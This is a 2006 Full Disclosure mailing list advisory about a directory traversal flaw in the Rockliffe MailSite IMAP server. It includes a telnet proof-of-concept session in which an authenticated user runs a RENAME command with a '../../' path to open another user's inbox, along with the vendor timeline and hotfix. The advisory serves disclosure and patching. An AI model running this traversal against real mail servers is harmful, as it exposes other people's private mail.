Full Disclosure mailing list archives
Rockliffe Directory Transversal Vulnerability
From: Josh Zlatin <jzlatin () ramat cc>
Date: Wed, 4 Jan 2006 09:59:39 -0500 (EST)
Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
Product: Rockliffe Mailsite
http://www.rockliffe.com
Version: Confirmed on Mailsite < 6.1.22.1
Author: Josh Zlatin-Amishav
Date: January 4, 2006
Background:
Rockliffe MailSite secure email server software and MailSite MP secure email
gateways provide email server solutions and gateway email protection for
businesses and service providers. Rockliffe has more than 3,000 customers
hosting more than 15 million mailboxes worldwide.
Issue: In working with researchers at Tenable Network Security, I have come acrossa directory transversal flaw in the IMAP server. It is possible for an authenticated user to access any user's inbox via a RENAME command.
PoC: josh@lab1:~$ telnet 10.0.0.5 143 Trying 10.0.0.5... Connected to 10.0.0.5. Escape character is '^]'. * OK MailSite IMAP4 Server 6.1.22.0 ready a1 login joe pass a1 OK LOGIN completed a2 rename ../../josh/INBOX gotcha a2 OK RENAME folder ../../josh/INBOX renamed to gotcha a3 select gotcha * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) * 0 EXISTS * 0 RECENT * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] * OK [UNSEEN 0] * OK [UIDVALIDITY 514563061] UIDs are valid a3 OK [READ-WRITE] opened gotcha user joe can now access the contents of user josh's INBOX directory. Vendor notified: January 3, 2006 06:12AM Vendor Response: Contact your sales rep about purchasing Mailsite 7.0.3.1 Solution: Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixesthe directory transversal problem. Either upgrade to version 6.1.22 and install the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of Mailsite. The hotfix can be obtained at:
ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe References: http://www.rockliffe.com References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Rockliffe Directory Transversal Vulnerability Josh Zlatin (Jan 04)
- Re: Rockliffe Directory Transversal Vulnerability Stan Bubrouski (Jan 04)
- Re[2]: Rockliffe Directory Transversal Vulnerability 3APA3A (Jan 04)
- Re: Rockliffe Directory Transversal Vulnerability Josh Zlatin (Jan 05)
- Re: Rockliffe Directory Transversal Vulnerability Stan Bubrouski (Jan 04)